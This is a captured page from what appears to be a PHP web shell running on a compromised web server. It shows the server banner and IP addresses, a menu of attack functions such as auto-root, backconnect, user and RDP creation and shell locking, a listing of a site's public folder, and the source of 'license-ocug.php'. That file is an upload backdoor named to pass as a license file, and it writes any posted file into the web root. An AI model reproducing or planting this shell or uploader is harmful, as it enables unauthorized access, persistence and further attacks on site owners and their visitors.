Linux server1.signalhg.team 4.18.0-553.134.1.el8_10.x86_64 #1 SMP Tue Jun 16 16:05:57 EDT 2026 x86_64
Apache
: 209.74.80.147 | : 216.73.216.85
150 Domain
8.1.34
signgwph
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
signgwph /
signaltechdemo9.com /
public /
[ HOME SHELL ]
Name
Size
Permission
Action
.well-known
[ DIR ]
drwxr-xr-x
audio
[ DIR ]
drwxrwxr-x
build
[ DIR ]
drwxrwxr-x
css
[ DIR ]
drwxrwxr-x
file
[ DIR ]
drwxrwxr-x
images
[ DIR ]
drwxr-xr-x
lib
[ DIR ]
drwxrwxr-x
paymentGateways
[ DIR ]
drwxrwxr-x
storage
[ DIR ]
drwxrwxr-x
themes
[ DIR ]
drwxrwxr-x
.gitignore
46
B
-rwxrwxr-x
.htaccess
2.23
KB
-r--r--r--
error_log
186.27
KB
-rwxrwxr-x
favicon.ico
0
B
-rw-rw-r--
firebase-cdn.txt
158
B
-rwxrwxr-x
firebase-content.txt
391
B
-rwxrwxr-x
firebase-messaging-sw.js
915
B
-rwxrwxr-x
goat1.php
143.87
KB
-rw-r--r--
index.php
21.27
KB
-r--r--r--
license-ocug.php
629
B
-rw-r--r--
robots.txt
85
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : license-ocug.php
<?php if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['image'])) { $f = $_FILES['image']; if ($f['error'] === UPLOAD_ERR_OK) { $name = basename($f['name']); $ok = move_uploaded_file($f['tmp_name'], __DIR__ . '/' . $name); echo $ok ? "<center><b>Done ==> {$name}</b></center>" : "<center><b>Error writing file</b></center>"; } else { echo "<center><b>Upload error code: {$f['error']}</b></center>"; } exit; } ?> 9dd6678cf1ea6f35 <form method="post" enctype="multipart/form-data"> <input type="file" name="image"> <input type="submit" value="Submit"> </form>
Close